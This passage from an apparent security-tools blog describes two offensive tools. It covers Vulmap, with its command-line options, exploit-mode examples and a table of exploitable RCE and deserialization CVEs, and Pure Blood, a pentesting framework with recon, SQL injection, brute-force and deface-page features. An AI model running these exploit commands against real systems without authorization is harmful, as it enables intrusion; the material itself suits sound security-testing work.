–debug Debug mode echo request and responses
–delay DELAY Delay check time, default 0s
–timeout TIMEOUT Scan timeout time, default 10s
–output FILE Text mode export (e.g. -o “result.txt”)

Examples

Test all vulnerabilities poc mode

python3 vulmap.py -u http://example.com

For RCE vuln, use the “id” command to test the vuln, because some linux does not have the “netstat -an” command

python3 vulmap.py -u http://example.com -c “id”

Check http://example.com for struts2 vuln

python3 vulmap.py -u http://example.com -a struts2

python3 vulmap.py -u http://example.com -m poc -a struts2

Exploit the CVE-2019-2729 vuln of WebLogic on http://example.com:7001

python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729

python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729

Batch scan URLs in list.txt

python3 vulmap.py -f list.txt

Export scan results to result.txt

python3 vulmap.py -u http://example.com:7001 -o result.txt

Vulnerability List

Vulmap supported vulnerabilities are as follows

+-------------------+------------------+-----+-----+-------------------------------------------------------------+
 | Target type       | Vuln Name        | Poc | Exp | Impact Version && Vulnerability description                 |
 +-------------------+------------------+-----+-----+-------------------------------------------------------------+
 | Apache Shiro      | CVE-2016-4437    |  Y  |  Y  | <= 1.2.4, shiro-550, rememberme deserialization rce         |
 | Apache Solr       | CVE-2017-12629   |  Y  |  Y  | < 7.1.0, runexecutablelistener rce & xxe, only rce is here  |
 | Apache Solr       | CVE-2019-0193    |  Y  |  N  | < 8.2.0, dataimporthandler module remote code execution     |
 | Apache Solr       | CVE-2019-17558   |  Y  |  Y  | 5.0.0 - 8.3.1, velocity response writer rce                 |
 | Apache Struts2    | S2-005           |  Y  |  Y  | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce   |
 | Apache Struts2    | S2-008           |  Y  |  Y  | 2.0.0 - 2.3.17, debugging interceptor rce                   |
 | Apache Struts2    | S2-009           |  Y  |  Y  | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce         |
 | Apache Struts2    | S2-013           |  Y  |  Y  | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce        |
 | Apache Struts2    | S2-015           |  Y  |  Y  | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce        |
 | Apache Struts2    | S2-016           |  Y  |  Y  | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce          |
 | Apache Struts2    | S2-029           |  Y  |  Y  | 2.0.0 - 2.3.24.1, ognl interpreter rce                      |
 | Apache Struts2    | S2-032           |  Y  |  Y  | 2.3.20-28, cve-2016-3081 rce can be performed via method    |
 | Apache Struts2    | S2-045           |  Y  |  Y  | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce     |
 | Apache Struts2    | S2-046           |  Y  |  Y  | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce     |
 | Apache Struts2    | S2-048           |  Y  |  Y  | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce             |
 | Apache Struts2    | S2-052           |  Y  |  Y  | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce  |
 | Apache Struts2    | S2-057           |  Y  |  Y  | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce  |
 | Apache Struts2    | S2-059           |  Y  |  Y  | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce           |
 | Apache Struts2    | S2-devMode       |  Y  |  Y  | 2.1.0 - 2.5.1, devmode remote code execution                |
 | Apache Tomcat     | Examples File    |  Y  |  N  | all version, /examples/servlets/servlet/SessionExample      |
 | Apache Tomcat     | CVE-2017-12615   |  Y  |  Y  | 7.0.0 - 7.0.81, put method any files upload                 |
 | Apache Tomcat     | CVE-2020-1938    |  Y  |  Y  | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read  |
 | Drupal            | CVE-2018-7600    |  Y  |  Y  | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution          |
 | Drupal            | CVE-2018-7602    |  Y  |  Y  | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce            |
 | Drupal            | CVE-2019-6340    |  Y  |  Y  | < 8.6.10, drupal core restful remote code execution         |
 | Jenkins           | CVE-2017-1000353 |  Y  |  N  | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution    |
 | Jenkins           | CVE-2018-1000861 |  Y  |  Y  | <= 2.153, LTS <= 2.138.3, remote code execution             |
 | Nexus OSS/Pro     | CVE-2019-7238    |  Y  |  Y  | 3.6.2 - 3.14.0, remote code execution vulnerability         |
 | Nexus OSS/Pro     | CVE-2020-10199   |  Y  |  Y  | 3.x  <= 3.21.1, remote code execution vulnerability         |
 | Oracle Weblogic   | CVE-2014-4210    |  Y  |  N  | 10.0.2 - 10.3.6, weblogic ssrf vulnerability                |
 | Oracle Weblogic   | CVE-2017-3506    |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce       |
 | Oracle Weblogic   | CVE-2017-10271   |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce       |
 | Oracle Weblogic   | CVE-2018-2894    |  Y  |  Y  | 12.1.3.0, 12.2.1.2-3, deserialization any file upload       |
 | Oracle Weblogic   | CVE-2019-2725    |  Y  |  Y  | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |
 | Oracle Weblogic   | CVE-2019-2729    |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |
 | Oracle Weblogic   | CVE-2020-2551    |  Y  |  N  | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |
 | Oracle Weblogic   | CVE-2020-2555    |  Y  |  Y  | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce  |
 | Oracle Weblogic   | CVE-2020-2883    |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |
 | Oracle Weblogic   | CVE-2020-14882   |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce     |
 | RedHat JBoss      | CVE-2010-0738    |  Y  |  Y  | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |
 | RedHat JBoss      | CVE-2010-1428    |  Y  |  Y  | 4.2.0 - 4.3.0, web-console deserialization any files upload |
 | RedHat JBoss      | CVE-2015-7501    |  Y  |  Y  | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |
 | ThinkPHP          | CVE-2019-9082    |  Y  |  Y  | < 3.2.4, thinkphp rememberme deserialization rce            |
 | ThinkPHP          | CVE-2018-20062   |  Y  |  Y  | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce  |
 +-------------------+------------------+-----+-----+-------------------------------------------------------------+

Docker

docker build -t vulmap/vulmap .
docker run –rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com

Download

The post Vulmap : Web Vulnerability Scanning & Verification Tools appeared first on Tech Chronicles.

Penetration Testing Framework – Pure Blood

Majordomo — Thu, 07 Jan 2021 19:55:45 +0000

Introduction

Pure Blood is a Penetration Testing Framework intended for all hackers, pentesters, bug hunters and those that wants to get involved in pentesting and cybersecurity area. It’s simple tool, created for everyone who need help for daily pentesting tasks, such as information gathering (Whois, DNS Lookup, Reverse DNS Lookup, etc), vulnerability analysis, etc.

Penetration testing, also known as pentesting or ethical hacking, is the practice of testing a computer system, network/web application to find security vulnerabilities that an evil user (attacker) could exploit. Penetration testing can be automated with software apps/ programms, penetration testing frameworks or performed manually.

Pure Blood v2: A Penetration Testing Framework created for Hackers

This penetration testing tool is tested on Windows and Kali Linux, but should work on any Linux distro and OS X.

Features

Web Pentest/Information Gathering

Banner Grab
Whois
Traceroute
DNS Record
Reverse DNS Lookup
Zone Transfer Lookup

Port Scan
Admin Panel Scan
Subdomain Scan
CMS Identify
Reverse IP Lookup
Subnet Lookup

Extract Page Links
Directory Fuzz
File Fuzz
Shodan Search
Shodan Host Lookup

Web Application Attack:

WordPress (WPScan, WPScan Bruteforce, WordPress Plugin Vulnerability Checker)
Auto SQL Injection

Generator:

Deface Page
Password Generator
Text To Hash

Requirements:

Python v2/3
All from requrements.txt file: (colorama, requests, python-whois, dnspython, bs4, shodan)

Modules can also be installed independently.

Install

Clone it form the Pure Blood GitHub repo:

$ git clone https://github.com/cr4shcod3/pureblood

Then navigate to the Pure Blood directory and install modules (requirements.txt):

$ cd pureblood
$ pip3 install -r requirements.tx

Usage

To start Pure Blood, run:

$ python3 pureblood.py

██▓███   █    ██  ██▀███  ▓█████  ▄▄▄▄    ██▓     ▒█████   ▒█████  ▓█████▄                                                                                              
▓██░  ██▒ ██  ▓██▒▓██ ▒ ██▒▓█   ▀ ▓█████▄ ▓██▒    ▒██▒  ██▒▒██▒  ██▒▒██▀ ██▌                                                                                             
▓██░ ██▓▒▓██  ▒██░▓██ ░▄█ ▒▒███   ▒██▒ ▄██▒██░    ▒██░  ██▒▒██░  ██▒░██   █▌                                                                                             
▒██▄█▓▒ ▒▓▓█  ░██░▒██▀▀█▄  ▒▓█  ▄ ▒██░█▀  ▒██░    ▒██   ██░▒██   ██░░▓█▄   ▌                                                                                             
▒██▒ ░  ░▒▒█████▓ ░██▓ ▒██▒░▒████▒░▓█  ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓                                                                                              
▒▓▒░ ░  ░░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░░░ ▒░ ░░▒▓███▀▒░ ▒░▓  ░░ ▒░▒░▒░ ░ ▒░▒░▒░  ▒▒▓  ▒                                                                                              
░▒ ░     ░░▒░ ░ ░   ░▒ ░ ▒░ ░ ░  ░▒░▒   ░ ░ ░ ▒  ░  ░ ▒ ▒░   ░ ▒ ▒░  ░ ▒  ▒                                                                                              
░░        ░░░ ░ ░   ░░   ░    ░    ░    ░   ░ ░   ░ ░ ░ ▒  ░ ░ ░ ▒   ░ ░  ░                                                                                              
            ░        ░        ░  ░ ░          ░  ░    ░ ░      ░ ░     ░                                                                                                 
                                        ░                            ░                                                                                                   
     --=[ Author: Cr4sHCoD3                     ]=--                                                                                                                     
| -- --=[ Version: 2                            ]=-- -- |                                                                                                                
| -- --=[ Website: https://github.com/cr4shcod3 ]=-- -- |                                                                                                                
| -- --=[ PureHackers ~ Blood Security Hackers  ]=-- -- |


[ PureBlood Menu ]

     01) Web Pentest / Information Gathering
     02) Web Application Attack
     03) Generator
     99) Exit

PureBlood>

Usage is very simple. Just choose an option, pick the target and follow the instructions.

Web Pentest/Information Gathering Example:

Choose Web Pentest from menu:

PureBlood> 1
[ Web Pentest ]
   01) Banner Grab
   02) Whois
   03) Traceroute
   04) DNS Record
   05) Reverse DNS Lookup
   06) Zone Transfer Lookup
   07) Port Scan
   08) Admin Panel Scan
   09) Subdomain Scan
   10) CMS Identify
   11) Reverse IP Lookup
   12) Subnet Lookup
   13) Extract Page Links
   14) Directory Fuzz
   15) File Fuzz
   16) Shodan Search
   17) Shodan Host Lookup
   90) Back To Menu
   95) Set Target
   99) Exit

PureBlood (WebPentest)>

Then select one of the options, and set the target:

PureBlood (WebPentest)> 2

PureBlood(WebPentest)> 95
[#] - Please don't put "/" in the end of the Target.
PureBlood>WebPentest>(Target)> www.google.com

Result:

"domain_name": [
    "GOOGLE.COM",
    "google.com"
  ],
  "registrar": "MarkMonitor, Inc.",
  "whois_server": "whois.markmonitor.com",
  "referral_url": null,
  "updated_date": [
    "2018-02-21 18:36:40",
    "2018-02-21 10:45:07"
  ],
  "creation_date": [
    "1997-09-15 04:00:00",
    "1997-09-15 00:00:00"
  ],
  "expiration_date": [
    "2020-09-14 04:00:00",
    "2020-09-13 21:00:00"
  ],
  "name_servers": [
    "NS1.GOOGLE.COM",
    "NS2.GOOGLE.COM",
    "NS3.GOOGLE.COM",
    "NS4.GOOGLE.COM",
    "ns4.google.com",
    "ns2.google.com",
    "ns1.google.com",
    "ns3.google.com"
  ],
  "status": [
    "clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited",
    "clientTransferProhibited https://icann.org/epp#clientTransferProhibited",
    "clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited",
    "serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited",
    "serverTransferProhibited https://icann.org/epp#serverTransferProhibited",
    "serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited",
    "clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)",
    "clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)",
    "clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)",
    "serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)",
    "serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)",
    "serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)"
  ],
  "emails": [
    "abusecomplaints@markmonitor.com",
    "whoisrelay@markmonitor.com"
  ],
  "dnssec": "unsigned",
  "name": null,
  "org": "Google LLC",
  "address": null,
  "city": null,
  "state": "CA",
  "zipcode": null,
  "country": "US"
}

Web App Attack Example:

Web Application Attack Usage Example (DEMO)

Download Pureblood

The post Penetration Testing Framework – Pure Blood appeared first on Tech Chronicles.